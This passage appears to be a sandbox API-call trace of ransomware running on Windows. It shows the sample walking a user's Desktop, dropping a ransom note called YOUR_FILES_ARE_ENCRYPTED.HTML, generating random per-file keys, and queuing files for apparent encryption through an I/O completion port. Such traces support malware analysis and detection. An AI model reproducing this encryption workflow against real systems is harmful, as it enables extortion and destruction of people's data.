ftCreationTime.dwLowDateTime=0x6927f970, ftCreationTime.dwHighDateTime=0x1d7009a, ftLastAccessTime.dwLowDateTime=0xb416c700, ftLastAccessTime.dwHighDateTime=0x1d705da, ftLastWriteTime.dwLowDateTime=0xb416c700, ftLastWriteTime.dwHighDateTime=0x1d705da, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0x2d0b38f, cFileName="RdWSR", cAlternateFileName="")) returned 0 [0123.885] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0123.885] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 68 [0123.885] GetProcessHeap () returned 0x600000 [0123.885] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x336a170 [0123.885] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\tota\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0123.886] WriteFile (in: hFile=0x32c, lpBuffer=0x336a170*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x336a170*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0123.887] CloseHandle (hObject=0x32c) returned 1 [0123.888] GetProcessHeap () returned 0x600000 [0123.888] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336a170 | out: hHeap=0x600000) returned 1 [0123.888] GetProcessHeap () returned 0x600000 [0123.888] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0123.888] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda4db7d0, ftCreationTime.dwHighDateTime=0x1d70819, ftLastAccessTime.dwLowDateTime=0xef69a9e0, ftLastAccessTime.dwHighDateTime=0x1d709bc, ftLastWriteTime.dwLowDateTime=0xef69a9e0, ftLastWriteTime.dwHighDateTime=0x1d709bc, nFileSizeHigh=0x0, nFileSizeLow=0x4e6f, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="UHsb6Fmm9lo7HKFMD.flv", cAlternateFileName="UHSB6F~1.FLV")) returned 1 [0123.889] StrStrIW (lpFirst="UHsb6Fmm9lo7HKFMD.flv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.889] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\UHsb6Fmm9lo7HKFMD.flv") returned 55 [0123.889] PathFindExtensionW (pszPath="UHsb6Fmm9lo7HKFMD.flv") returned=".flv" [0123.889] lstrlenW (lpString=".flv") returned 4 [0123.889] PathFindExtensionW (pszPath="UHsb6Fmm9lo7HKFMD.flv") returned=".flv" [0123.889] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0123.889] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\UHsb6Fmm9lo7HKFMD.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\uhsb6fmm9lo7hkfmd.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0123.890] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=20079) returned 1 [0123.890] GetProcessHeap () returned 0x600000 [0123.890] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0123.893] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="6D") returned 2 [0123.893] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="A7") returned 2 [0123.893] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="8A") returned 2 [0123.893] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="F7") returned 2 [0123.893] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="4E") returned 2 [0123.893] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="47") returned 2 [0123.893] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="DE") returned 2 [0123.893] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="9D") returned 2 [0123.893] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="08") returned 2 [0123.893] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="D2") returned 2 [0123.893] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="F9") returned 2 [0123.893] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="D3") returned 2 [0123.893] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="2E") returned 2 [0123.893] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="17") returned 2 [0123.893] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="01") returned 2 [0123.893] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="D1") returned 2 [0123.893] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="E2") returned 2 [0123.893] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="F1") returned 2 [0123.893] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="FE") returned 2 [0123.893] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="CB") returned 2 [0123.893] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="A8") returned 2 [0123.893] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="86") returned 2 [0123.893] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="F5") returned 2 [0123.893] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="D9") returned 2 [0123.893] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="00") returned 2 [0123.893] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="86") returned 2 [0123.893] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="90") returned 2 [0123.894] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="12") returned 2 [0123.894] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="A8") returned 2 [0123.894] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="49") returned 2 [0123.894] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="D5") returned 2 [0123.894] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="01") returned 2 [0123.894] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\UHsb6Fmm9lo7HKFMD.flv" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\UHsb6Fmm9lo7HKFMD.flv") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\UHsb6Fmm9lo7HKFMD.flv" [0123.894] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.894] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0123.896] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe065d7b0, ftCreationTime.dwHighDateTime=0x1d70193, ftLastAccessTime.dwLowDateTime=0x38571140, ftLastAccessTime.dwHighDateTime=0x1d707ee, ftLastWriteTime.dwLowDateTime=0x38571140, ftLastWriteTime.dwHighDateTime=0x1d707ee, nFileSizeHigh=0x0, nFileSizeLow=0x15526, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="UpEL XpeLrR2vLR.ods", cAlternateFileName="UPELXP~1.ODS")) returned 1 [0123.896] StrStrIW (lpFirst="UpEL XpeLrR2vLR.ods", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.896] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\UpEL XpeLrR2vLR.ods") returned 53 [0123.896] PathFindExtensionW (pszPath="UpEL XpeLrR2vLR.ods") returned=".ods" [0123.896] lstrlenW (lpString=".ods") returned 4 [0123.896] PathFindExtensionW (pszPath="UpEL XpeLrR2vLR.ods") returned=".ods" [0123.896] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0123.896] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\UpEL XpeLrR2vLR.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\upel xpelrr2vlr.ods"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0123.897] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=87334) returned 1 [0123.897] GetProcessHeap () returned 0x600000 [0123.897] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x336df60 [0123.901] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="A5") returned 2 [0123.901] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="BA") returned 2 [0123.901] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="56") returned 2 [0123.901] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="B8") returned 2 [0123.901] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="D5") returned 2 [0123.901] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="CA") returned 2 [0123.901] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="91") returned 2 [0123.901] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="44") returned 2 [0123.901] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="98") returned 2 [0123.901] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="8C") returned 2 [0123.901] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="3E") returned 2 [0123.901] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="4B") returned 2 [0123.901] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="1B") returned 2 [0123.901] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="E1") returned 2 [0123.901] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="14") returned 2 [0123.901] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="71") returned 2 [0123.901] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="D4") returned 2 [0123.901] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="AF") returned 2 [0123.901] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="36") returned 2 [0123.901] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="07") returned 2 [0123.901] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="FA") returned 2 [0123.901] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="FF") returned 2 [0123.901] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="35") returned 2 [0123.901] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="9C") returned 2 [0123.902] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="8E") returned 2 [0123.902] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="F0") returned 2 [0123.902] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="A3") returned 2 [0123.902] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="85") returned 2 [0123.902] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="2B") returned 2 [0123.902] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="3C") returned 2 [0123.902] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="21") returned 2 [0123.902] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="02") returned 2 [0123.902] lstrcpyW (in: lpString1=0x337e014, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\UpEL XpeLrR2vLR.ods" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\UpEL XpeLrR2vLR.ods") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\UpEL XpeLrR2vLR.ods" [0123.902] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x336df60, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.903] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x336df60, lpOverlapped=0x336df60) returned 1 [0123.903] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4d2c920, ftCreationTime.dwHighDateTime=0x1d70442, ftLastAccessTime.dwLowDateTime=0xff81270, ftLastAccessTime.dwHighDateTime=0x1d708f3, ftLastWriteTime.dwLowDateTime=0xff81270, ftLastWriteTime.dwHighDateTime=0x1d708f3, nFileSizeHigh=0x0, nFileSizeLow=0x18cea, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="WVeH9q0ejR.bmp", cAlternateFileName="WVEH9Q~1.BMP")) returned 1 [0123.903] StrStrIW (lpFirst="WVeH9q0ejR.bmp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.903] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\WVeH9q0ejR.bmp") returned 48 [0123.903] PathFindExtensionW (pszPath="WVeH9q0ejR.bmp") returned=".bmp" [0123.903] lstrlenW (lpString=".bmp") returned 4 [0123.903] PathFindExtensionW (pszPath="WVeH9q0ejR.bmp") returned=".bmp" [0123.903] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0123.904] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\WVeH9q0ejR.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\wveh9q0ejr.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x33c [0123.904] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=101610) returned 1 [0123.905] GetProcessHeap () returned 0x600000 [0123.905] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0123.907] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="75") returned 2 [0123.907] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="45") returned 2 [0123.907] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="45") returned 2 [0123.907] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="00") returned 2 [0123.907] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="CA") returned 2 [0123.907] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="9E") returned 2 [0123.907] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="2F") returned 2 [0123.907] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="31") returned 2 [0123.907] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="27") returned 2 [0123.907] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="78") returned 2 [0123.907] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="60") returned 2 [0123.907] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="3C") returned 2 [0123.907] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="EF") returned 2 [0123.908] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="D3") returned 2 [0123.908] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="A2") returned 2 [0123.908] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="D0") returned 2 [0123.908] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="7D") returned 2 [0123.908] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="98") returned 2 [0123.908] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="04") returned 2 [0123.908] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="0A") returned 2 [0123.908] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="DD") returned 2 [0123.908] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="6B") returned 2 [0123.908] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="A0") returned 2 [0123.908] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="76") returned 2 [0123.908] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="05") returned 2 [0123.908] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="E7") returned 2 [0123.908] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="EA") returned 2 [0123.908] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="D7") returned 2 [0123.908] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="47") returned 2 [0123.908] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="34") returned 2 [0123.908] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="D0") returned 2 [0123.908] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="16") returned 2 [0123.909] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\WVeH9q0ejR.bmp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\WVeH9q0ejR.bmp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\WVeH9q0ejR.bmp" [0123.909] CreateIoCompletionPort (FileHandle=0x33c, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.909] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0123.910] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x316ca7a0, ftCreationTime.dwHighDateTime=0x1d7053c, ftLastAccessTime.dwLowDateTime=0xfde32020, ftLastAccessTime.dwHighDateTime=0x1d70852, ftLastWriteTime.dwLowDateTime=0xfde32020, ftLastWriteTime.dwHighDateTime=0x1d70852, nFileSizeHigh=0x0, nFileSizeLow=0x11064, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="wYB2lc 3ses0kulb4Xw5.mp3", cAlternateFileName="WYB2LC~1.MP3")) returned 1 [0123.910] StrStrIW (lpFirst="wYB2lc 3ses0kulb4Xw5.mp3", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.910] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\wYB2lc 3ses0kulb4Xw5.mp3") returned 58 [0123.910] PathFindExtensionW (pszPath="wYB2lc 3ses0kulb4Xw5.mp3") returned=".mp3" [0123.910] lstrlenW (lpString=".mp3") returned 4 [0123.910] PathFindExtensionW (pszPath="wYB2lc 3ses0kulb4Xw5.mp3") returned=".mp3" [0123.910] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0123.910] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\wYB2lc 3ses0kulb4Xw5.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\wyb2lc 3ses0kulb4xw5.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0123.911] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=69732) returned 1 [0123.911] GetProcessHeap () returned 0x600000 [0123.911] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0123.914] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="67") returned 2 [0123.914] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="EB") returned 2 [0123.914] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="3C") returned 2 [0123.914] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="40") returned 2 [0123.914] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="73") returned 2 [0123.914] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="6A") returned 2 [0123.914] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="E6") returned 2 [0123.914] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="BF") returned 2 [0123.914] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="F6") returned 2 [0123.914] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="2F") returned 2 [0123.914] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="BA") returned 2 [0123.914] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="09") returned 2 [0123.914] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="AE") returned 2 [0123.914] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="1F") returned 2 [0123.914] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="98") returned 2 [0123.914] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="D4") returned 2 [0123.914] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="4A") returned 2 [0123.915] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="03") returned 2 [0123.915] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="8D") returned 2 [0123.915] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="CE") returned 2 [0123.915] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="6A") returned 2 [0123.915] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="9B") returned 2 [0123.915] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="C7") returned 2 [0123.915] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="77") returned 2 [0123.915] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="DA") returned 2 [0123.915] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="D4") returned 2 [0123.915] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="A1") returned 2 [0123.915] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="C0") returned 2 [0123.915] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="06") returned 2 [0123.915] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="F6") returned 2 [0123.915] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="F6") returned 2 [0123.915] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="5D") returned 2 [0123.916] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\wYB2lc 3ses0kulb4Xw5.mp3" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\wYB2lc 3ses0kulb4Xw5.mp3") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\wYB2lc 3ses0kulb4Xw5.mp3" [0123.916] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.916] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0123.916] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f378d20, ftCreationTime.dwHighDateTime=0x1d6ff4c, ftLastAccessTime.dwLowDateTime=0x40a469a0, ftLastAccessTime.dwHighDateTime=0x1d705e7, ftLastWriteTime.dwLowDateTime=0x40a469a0, ftLastWriteTime.dwHighDateTime=0x1d705e7, nFileSizeHigh=0x0, nFileSizeLow=0x11c6c, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="x-8u.swf", cAlternateFileName="")) returned 1 [0123.916] StrStrIW (lpFirst="x-8u.swf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.916] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\x-8u.swf") returned 42 [0123.916] PathFindExtensionW (pszPath="x-8u.swf") returned=".swf" [0123.916] lstrlenW (lpString=".swf") returned 4 [0123.916] PathFindExtensionW (pszPath="x-8u.swf") returned=".swf" [0123.916] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x308f4570, ftCreationTime.dwHighDateTime=0x1d70156, ftLastAccessTime.dwLowDateTime=0x9dc294b0, ftLastAccessTime.dwHighDateTime=0x1d70487, ftLastWriteTime.dwLowDateTime=0x9dc294b0, ftLastWriteTime.dwHighDateTime=0x1d70487, nFileSizeHigh=0x0, nFileSizeLow=0xa26f, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="XKIyMoB.gif", cAlternateFileName="")) returned 1 [0123.916] StrStrIW (lpFirst="XKIyMoB.gif", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.916] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\XKIyMoB.gif") returned 45 [0123.916] PathFindExtensionW (pszPath="XKIyMoB.gif") returned=".gif" [0123.917] lstrlenW (lpString=".gif") returned 4 [0123.917] PathFindExtensionW (pszPath="XKIyMoB.gif") returned=".gif" [0123.917] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0123.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\XKIyMoB.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xkiymob.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0123.918] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=41583) returned 1 [0123.918] GetProcessHeap () returned 0x600000 [0123.918] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0123.920] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="08") returned 2 [0123.920] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="D1") returned 2 [0123.920] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="C7") returned 2 [0123.920] wsprintfW (in: 